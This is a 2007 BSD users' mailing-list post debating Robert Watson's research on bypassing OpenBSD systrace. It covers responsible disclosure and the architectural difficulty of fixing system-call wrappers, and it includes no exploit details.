[nycbug-talk] Cambridge Researcher Breaks OpenBSD Systrace

Isaac Levy ike at lesmuug.org
Fri Aug 10 12:12:55 EDT 2007


Wow,

On Aug 9, 2007, at 7:22 PM, Alex Pilosov wrote:
> On Thu, 9 Aug 2007, Miles Nordin wrote:
>
>> I find it a bit disgusting that he understood the issues in 2002 but
>> <snip>
>> some reason which becomes clear over
>> the next few months.
> I believe it is because doing security research inherently takes  
> more time
> than making up conspiracy theories.
>
> -alex

Alex is 100% right here.


On Aug 9, 2007, at 7:38 PM, Peter Wright wrote:
> so what's up - posting his specific concerns on a public mailing list,
> then going to Cambridge from the private sector - spending time to  
> create
> a proper academic paper for a conference (which is in its inaugural  
> year
> WOOT '07) is considered underhanded, or cause for suspicion of  
> ulterior
> motives?
>
> got it.
>
> -p

Pete is 100% right with the clear intention, based on the order of  
events.

--
Working at extremely deep levels with anything, (like this new work),  
means a person doesn't get the luxurious time involved to install  
every new app/tool that comes along, even those lauded by the  
security community- let alone test them all in any comprehensive manner.

Who stands to loose from this situation?  Don't we all stand to gain?


On Aug 9, 2007, at 7:59 PM, Jonathan Vanasco wrote:

> On Aug 9, 2007, at 1:42 PM, Marc Spitzer wrote:
>
>> An anonymous reader writes "University of Cambridge researcher Robert
>> Watson has published a paper at the First USENIX Workshop On  
>> Offensive
>
> I'm just wondering if he contacted OpenBSD , "Systrace, Sudo,
> Sysjail, the TIS GSWTK framework, and CerbNG" first, and worked out a
> disclosure timeframe
>
> I couldn't find that information anywhere.

Well, I just Google'd around for it myself, and didn't find anything-  
BUT, judging from the reactions from the various groups you mention,  
direct open-disclosure seems the best route here.

I mean really, what is Kristaps Johnson (Sysjail author and generally  
cool person), going to do with advanced knowledge of this  
vulnerability?  He'd have to take time out of his work/life to fully  
comprehend or replicate it, and then sit on his hands until everyone  
knows?

Additionally, to keep the sanity here, Sysjail as an example has not  
yet ever been advertised as production software, and it's very very new.

>
> Personally, I find that the difference between wanting to offer a
> security researcher a "THANK YOU!!!!" or a 'F**k You for disclosing
> holes in software before I had time to patch my system'

On Zero-Daze:

This is also a fundamental problem which is not trivially resolvable.
   - Therefore, there is no patch in sight on the horizon.

This isn't a windows or vendor sploit'.
   - How you propose we patch our systems without realizing "hey,  
systrace isn't enabled anymore!"  (and thereby giving everybody in  
the world X days to slam systrace, possibly succeeding in the same or  
similar exploits).  Or even just saying "systrace is broken, everyone  
will know why in X days" is silly.  It's not like proprietary and  
locked down binaries- we all have the source code here.

This is relatively new software, which a small fraction of very  
technical people have deployed, most of whom lived with running  
systems far before it existed.

--
In context, there's no F**k you involved here, software gets cracked-  
period.  Any *important* system must have a diverse backup plan, for  
every critical component, if it's is going to survive the cracks-  
(like what's everyone's plan for the dreadful day that OpenSSH gets  
hosed? [aside from running for the hills]).

Another aspect of this particular issue, systrace itself is  
relatively new, (although the idea is not).  It's complicated enough,  
just in it's implementation and use.  It's implications on a running  
system are then additionally complicated, by magnitudes of increasing  
complexity.

These kinds of massive-scale security tools take years to mature, and  
more years to get refined to come close to meeting their objectives.

- With that stated, my longwinded point, is that anyone who's crying  
because they didn't have a failure and replacement plan for a  
critical software they use, isn't really taking the issue seriously.   
Depending on any singularity is a risk.  To end this thought, a  
related news-quote snippet:

Bruce Schneier's Black Hat Keynote:
"Bruce reiterated his ideas of the "security consumer" who asks "is  
it worth it?" when deciding whether or not to wear a bullet-proof  
vest when walking out his front door."

     From a terrific Black-Hat overview by Richard Bejtlich:
     http://taosecurity.blogspot.com/2007/08/black-hat-usa-2007-round- 
up-part-2.html

Bruce, and Richard, are right on these days- IMHO.

--
Additionally, nobody has discussed this angle on this list:
"Systrace is dead, long live Systrace"

+ Systrace isn't dead because of this issue(?), it just has to be re- 
thought from scratch in the scope of it's implementation.
A successful example of this is jail(2)/jail(8) - it was a response  
to chroot(2) exploits, remember?  HOWEVER, jail(2) was not the only  
answer, jailing only works because of the audits made to the rest of  
the operating system- a tedious and holistic approach, which has  
served everyone well.  Jailing required nearly every system call to  
be audited, (and thank goodness the TrustedBSD project just so  
happened to be doing a whole lot of that...)
Similarly, the problems with systrace are larger architectural  
issues, which can likely be resolved with continued (and arduous)  
work- and possible consequences and tradeoffs for other kernel  
features.  That stuff has to be figured out- and that work is slow  
and hard.
These were some lessons learned from the TrustedBSD project, a fork  
to explore these kinds patterns in secure development.  (and Robert  
Watson was a huge part of that project, btw).


/me spouting .04¢ on this one

Rocket-
.ike






More information about the talk mailing list